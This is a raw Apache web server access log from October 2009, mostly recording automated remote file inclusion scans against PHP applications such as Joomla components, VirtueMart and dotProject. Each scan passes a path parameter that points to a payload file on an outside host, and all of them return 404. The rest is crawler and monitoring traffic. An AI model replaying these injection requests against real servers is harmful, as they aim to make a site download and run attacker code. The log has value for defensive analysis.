64.150.183.219 - - [18/Oct/2009:05:27:57 -0400] "GET /logs/access_log.Q109062800/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:28:33 -0400] "GET /logs/access_log.Q109082400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:28:33 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:28:34 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:28:52 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:29:21 -0400] "GET /logs/access_log.Q109062900%20%20/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:29:21 -0400] "GET /logs/access_log.Q109062800%20%20/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:29:21 -0400] "GET /logs/access_log.Q109062900%20%20/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:29:21 -0400] "GET /logs/access_log.Q109062800%20%20/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:29:26 -0400] "GET /logs/access_log.Q109062900%20%20/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:05:29:26 -0400] "GET /logs/access_log.Q109062800%20%20/_conf/core/common-tpl-vars.php?confdir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
118.107.162.36 - - [18/Oct/2009:05:29:40 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
118.107.162.36 - - [18/Oct/2009:05:29:40 -0400] "GET //appserv/main.php?appserv_root=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.107.162.36 - - [18/Oct/2009:05:29:40 -0400] "GET /logs/access_log.Q109051400%20%20//appserv/main.php?appserv_root=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.144.1.134 - - [18/Oct/2009:05:29:42 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt??????? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
118.107.162.36 - - [18/Oct/2009:05:30:08 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/main.php?appserv_root=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:05:30:18 -0400] "GET /logs/access_log.Q109081300%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
110.45.147.248 - - [18/Oct/2009:05:30:47 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:05:30:47 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:05:30:47 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:05:30:47 -0400] "GET /logs/access_log.Q109062400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.59.12.99 - - [18/Oct/2009:05:32:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
147.46.116.207 - - [18/Oct/2009:05:33:06 -0400] "GET /logs/access_log.Q109070700/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:05:33:08 -0400] "GET /logs/error_log.Q109100600 HTTP/1.0" 200 4163007 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.48.121.149 - - [18/Oct/2009:05:33:31 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:05:33:15 -0400] "GET /logs/error_log.Q109100600 HTTP/1.0" 200 4163007 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.48.121.149 - - [18/Oct/2009:05:33:53 -0400] "GET /logs/access_log.Q109093000%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.40.68.132 - - [18/Oct/2009:05:33:56 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.40.68.132 - - [18/Oct/2009:05:33:56 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.40.68.132 - - [18/Oct/2009:05:34:02 -0400] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:34:19 -0400] "GET //include/admin.lib.inc.php?site_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:34:19 -0400] "GET /logs/error_log.Q109090400//include/admin.lib.inc.php?site_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:34:20 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:05:34:21 -0400] "GET /logs/access_log.Q109100600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:34:25 -0400] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:05:34:32 -0400] "GET /logs/access_log.Q109083100//admin/business_inc/saveserver.php?thisdir=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:05:34:32 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:05:34:32 -0400] "GET /logs/access_log.Q109052400//admin/business_inc/saveserver.php?thisdir=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:05:34:33 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:36:51 -0400] "GET /logs/error_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:36:53 -0400] "GET /logs/access_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:05:37:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
99.227.87.27 - - [18/Oct/2009:05:37:21 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://mail.marlboroughoms.com/iclient/PreviewMsg.aspx?SeqNum=505252581" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
211.48.121.149 - - [18/Oct/2009:05:38:14 -0400] "GET /logs/access_log.Q109093000%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
220.125.237.35 - - [18/Oct/2009:05:41:00 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
220.125.237.35 - - [18/Oct/2009:05:41:00 -0400] "GET /logs/access_log.Q109071400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
220.125.237.35 - - [18/Oct/2009:05:41:00 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
220.125.237.35 - - [18/Oct/2009:05:41:01 -0400] "GET /logs/access_log.Q109100500/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:42 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:42 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:42 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:47 -0400] "GET /logs/access_log.Q109062400//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:49 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:49 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:49 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:50 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:50 -0400] "GET /logs/access_log.Q109062500%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:50 -0400] "GET /logs/access_log.Q109062500%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:50 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:50 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:50 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:52 -0400] "GET /logs/access_log.Q109062400//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:54 -0400] "GET /logs/access_log.Q109062400%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:41:54 -0400] "GET /logs/access_log.Q109062400%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:05:42:21 -0400] "GET /logs/error_log.Q109061800 HTTP/1.0" 200 2820532 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.211.14.134 - - [18/Oct/2009:05:42:36 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:42:36 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:42:36 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:42:39 -0400] "GET /logs/access_log.Q109062400//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:05:42:25 -0400] "GET /logs/error_log.Q109061800 HTTP/1.0" 200 2820532 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [18/Oct/2009:05:43:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
147.46.116.207 - - [18/Oct/2009:05:43:03 -0400] "GET /logs/access_log.Q109100600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:43:23 -0400] "GET //include/bbs.lib.inc.php?site_path=http://crewlabs.net/id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:43:23 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://crewlabs.net/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:43:23 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://crewlabs.net/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:43:27 -0400] "GET //include/bbs.lib.inc.php?site_path=http://crewlabs.net/id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:43:28 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://crewlabs.net/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:43:28 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://crewlabs.net/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
220.125.237.35 - - [18/Oct/2009:05:43:55 -0400] "GET /logs/access_log.Q109100500%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
220.125.237.35 - - [18/Oct/2009:05:43:55 -0400] "GET /logs/access_log.Q109070200%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:44:18 -0400] "GET //dotproject//includes/db_connect.php?baseDir=http://crewlabs.net/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:44:18 -0400] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://crewlabs.net/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:44:19 -0400] "GET /logs/access_log.Q109091900//dotproject//includes/db_connect.php?baseDir=http://crewlabs.net/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:44:25 -0400] "GET //dotproject//includes/db_connect.php?baseDir=http://crewlabs.net/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:44:26 -0400] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://crewlabs.net/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:44:26 -0400] "GET /logs/access_log.Q109091900//dotproject//includes/db_connect.php?baseDir=http://crewlabs.net/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:44:36 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:44:36 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:44:36 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:44:40 -0400] "GET /logs/access_log.Q109062400//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:44:40 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:44:40 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:44:40 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:05:44:44 -0400] "GET /logs/access_log.Q109062400//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:45:01 -0400] "GET /logs/error_log.Q109100300/index.php?redir=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:45:01 -0400] "GET /logs/index.php?redir=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:45:01 -0400] "GET /index.php?redir=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:45:16 -0400] "GET /logs/access_log.Q109071900/index.php?redir=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:05:45:23 -0400] "GET /logs/access_log.Q109083100%20%20//admin/business_inc/saveserver.php?thisdir=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:05:45:39 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:45:53 -0400] "GET /logs/error_log.Q109100300%20%20/index.php?redir=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:05:46:03 -0400] "GET /logs/access_log.Q109071900%20%20/index.php?redir=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.147.248 - - [18/Oct/2009:05:47:04 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:05:47:04 -0400] "GET /logs/access_log.Q109050800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:05:47:04 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
72.30.78.230 - - [18/Oct/2009:05:46:18 -0400] "GET /logs/access_log.Q109090800 HTTP/1.0" 200 5714765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.107.162.36 - - [18/Oct/2009:05:47:24 -0400] "GET /logs/access_log.Q109051400//appserv/main.php?appserv_root=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.107.162.36 - - [18/Oct/2009:05:47:27 -0400] "GET /logs/access_log.Q109092600//appserv/main.php?appserv_root=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.147.248 - - [18/Oct/2009:05:47:27 -0400] "GET /logs/access_log.Q109051900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.30.78.230 - - [18/Oct/2009:05:47:48 -0400] "GET /logs/error_log.Q109030700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [18/Oct/2009:05:48:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.78.230 - - [18/Oct/2009:05:49:32 -0400] "GET /logs/error_log.Q109071500 HTTP/1.0" 200 2232707 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.230 - - [18/Oct/2009:05:49:33 -0400] "GET /logs/error_log.Q109071500 HTTP/1.0" 200 2232707 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.251.169.156 - - [18/Oct/2009:05:50:33 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://crewlabs.net/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.251.169.156 - - [18/Oct/2009:05:50:47 -0400] "GET /logs/error_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://crewlabs.net/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.176.226.164 - - [18/Oct/2009:05:51:08 -0400] "GET /logs/phphtml.php?htmlclass_path=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 214 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
81.176.226.164 - - [18/Oct/2009:05:51:08 -0400] "GET /phphtml.php?htmlclass_path=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 209 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
81.176.226.164 - - [18/Oct/2009:05:51:08 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://scottstuart.org/PHP-Nuke/html/modules/WebMail/attachments/IDtest.txt??? HTTP/1.1" 404 236 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
66.249.71.51 - - [18/Oct/2009:05:51:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0135794C96980900DEE806W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
